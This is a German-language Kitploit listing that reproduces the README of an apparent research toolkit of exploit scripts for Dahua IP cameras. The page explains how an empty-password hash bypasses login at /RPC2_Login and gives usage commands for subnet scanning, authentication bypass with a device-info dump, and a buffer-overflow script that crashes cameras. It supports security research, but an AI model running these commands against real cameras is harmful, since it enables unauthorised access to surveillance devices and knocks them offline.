Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
dahua-cve-research — Dahua IP-Kamera CVE-Forschungstoolkit (CVE-2021-33044/33045, CVE-2025-31700/31701) | Kitploit
Tools/GitHubGitHub/umair-aziz025/dahua-cve-research
IoT-SicherheitNetzwerkkartierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungLernen & Bildung
GitHubumair-aziz025/dahua-cve-research

dahua-cve-research

Dahua IP-Kamera CVE-Forschungstoolkit (CVE-2021-33044/33045, CVE-2025-31700/31701)

Repository anzeigen
2162vor 5 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dahua IP-Kamera CVE Exploit Tools

⚠️ IN ENTWICKLUNG — Diese Skripte basieren auf veröffentlichten CVE-Details und erfordern weitere Tests an verwundbaren Geräten, um die vollständige Funktionalität zu bestätigen.

Forschung und Proof-of-Concept-Skripte für vier kritische Schwachstellen in Dahua IP-Kameras.


⚠️ RECHTLICHER HINWEIS

root@kitploit:~
DIESE SOFTWARE WIRD NUR ZU BILDUNGSZWECKEN UND FÜR AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.

Durch die Nutzung dieser Tools stimmen Sie zu:
  1. Sie haben eine AUSDRÜCKLICHE SCHRIFTLICHE GENEHMIGUNG, die Zielsysteme zu testen.
  2. Sie werden diese Tools NICHT für illegale Aktivitäten verwenden.
  3. Sie übernehmen die volle Verantwortung für Ihre Handlungen.
  4. Die Autoren haften NICHT für Missbrauch oder Schäden.

Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen eine STRAFTAT.

Abgedeckte CVEs

CVECVSSTypStatus
CVE-2021-330449.8 KRITISCHAuthentifizierungsumgehungCISA KEV (aktiv ausgenutzt)
CVE-2021-330459.8 KRITISCHAuthentifizierungsumgehungCISA KEV (aktiv ausgenutzt)
CVE-2025-317008.1 HOCHBuffer Overflow DoSNeu (2025)
CVE-2025-317018.1 HOCHBuffer Overflow DoSNeu (2025)

CVE-2021-33044 & CVE-2021-33045 — Authentifizierungsumgehung

  • CVSS: 9.8 KRITISCH
  • CWE: CWE-287 (Unzureichende Authentifizierung)
  • Mechanismus: RPC2-Login akzeptiert leeres Passwort-Hash und gewährt Admin-Zugriff
  • Betroffen: IPC-HUM7xxx, IPC-HX3xxx/HX5xxx, TPC-, VTO-, VTH-, NVR-, XVR-*
  • Behoben in: Firmware 2.820.x+ (IPC) / 4.001.x+ (NVR/XVR)
  • Referenzen:
    • NVD CVE-2021-33044
    • NVD CVE-2021-33045
    • CISA KEV Katalog

CVE-2025-31700 & CVE-2025-31701 — Buffer Overflow (DoS/RCE)

  • CVSS: 8.1 HOCH
  • CWE: CWE-120 (Pufferkopie ohne Größenprüfung)
  • Mechanismus: Überdimensionierte Pakete verursachen Pufferüberlauf → Absturz oder potenzielle RCE
  • Referenzen:
    • NVD CVE-2025-31700
    • Dahua Security Advisory

Wie die Authentifizierungsumgehung funktioniert

Dahua-Kameras verwenden Challenge-Response-Authentifizierung über /RPC2_Login:

root@kitploit:~
Normaler Login:
  step1 = MD5("admin:realm:PASSWORD")
  step2 = MD5("step1:random:step1")

Umgehung (CVE-2021-33044/45):
  step1 = MD5("admin:realm:")      ← LEERES Passwort
  step2 = MD5("step1:random:step1")

Die anfällige Firmware akzeptiert den leeren Passwort-Hash und gibt ein gültiges Sitzungstoken zurück.


Skripte


Installation

root@kitploit:~
# Repository klonen
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit

# Abhängigkeiten installieren
pip install requests

Verwendung

Netzwerkscanner

root@kitploit:~
# Subnetz scannen (Ports erforderlich)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081

# Einzelner Host mit Port
python dahua_scanner.py 192.168.1.100:8081

# Alle Optionen
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json

# Hilfe anzeigen
python dahua_scanner.py --help

Häufige Dahua-Ports: 80, 8000, 8080, 8081, 8888, 9000, 443, 37777

Multi-CVE-Exploit (empfohlen)

root@kitploit:~
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044  # Einzelnes CVE
python dahua_exploit.py --help

Authentifizierungsumgehung

root@kitploit:~
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump  # Geräteinformationen nach Umgehung ausgeben

Buffer Overflow DoS

root@kitploit:~
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http  # Nur HTTP
python dahua_rce.py 192.168.1.100 --cve tcp   # Nur TCP/37777

⚠️ WARNUNG: Das DoS-Skript kann das Zielgerät zum Absturz bringen.


Abhängigkeiten

root@kitploit:~
requests

Alle anderen Importe stammen aus der Python-Standardbibliothek: socket, struct, hashlib, threading, ipaddress, argparse, json


Entwicklungsstatus

🚧 IN AKTIVER ENTWICKLUNG

Diese Skripte wurden basierend auf Folgendem entwickelt:

  • Veröffentlichte CVE-Details des NVD
  • Dahua-Sicherheitshinweise
  • Öffentliche PoC-Referenzen (seclists.org, packetstormsecurity)

Teststatus:

  • ✅ Authentifizierungsumgehungslogik gemäß CVE-Spezifikationen implementiert
  • ✅ Buffer-Overflow-Payloads gemäß Sicherheitshinweisen erstellt
  • ⚠️ Eingeschränkte Tests an aktiven, verwundbaren Geräten
  • ⚠️ Zusätzliche Validierung für verschiedene Firmware-Versionen erforderlich

Wenn Sie Zugang zu verwundbaren Geräten für Tests haben, sind Beiträge und Feedback willkommen.


Beitragen

  1. Repository forken
  2. Einen Feature-Branch erstellen
  3. Ihre Änderungen testen
  4. Einen Pull-Request einreichen

Bitte melden Sie alle Probleme oder Fehlalarme.


Referenzen

  • NVD - CVE-2021-33044
  • NVD - CVE-2021-33045
  • NVD - CVE-2025-31700
  • NVD - CVE-2025-31701
  • CISA Bekannte ausgenutzte Schwachstellen
  • Dahua Sicherheitszentrum
  • Bashis PoC - Seclists

Lizenz

MIT-Lizenz – Siehe LICENSE-Datei.


Autor

Umair Aziz
GitHub: @umair-aziz025


Nur für Bildungszwecke und autorisierte Sicherheitsforschung.

Tool herunterladen
DateiZweckCVEs
dahua_scanner.pyNetzwerkerkennung — Dahua-Kameras im Subnetz findenErkennung
dahua_exploit.pyMulti-CVE-Scanner — alle Schwachstellen testenAlle
dahua_auth_bypass.pyDedizierte Authentifizierungsumgehung mit --dump-OptionCVE-2021-33044/45
dahua_rce.pyBuffer-Overflow-DoS-SondeCVE-2025-31700/01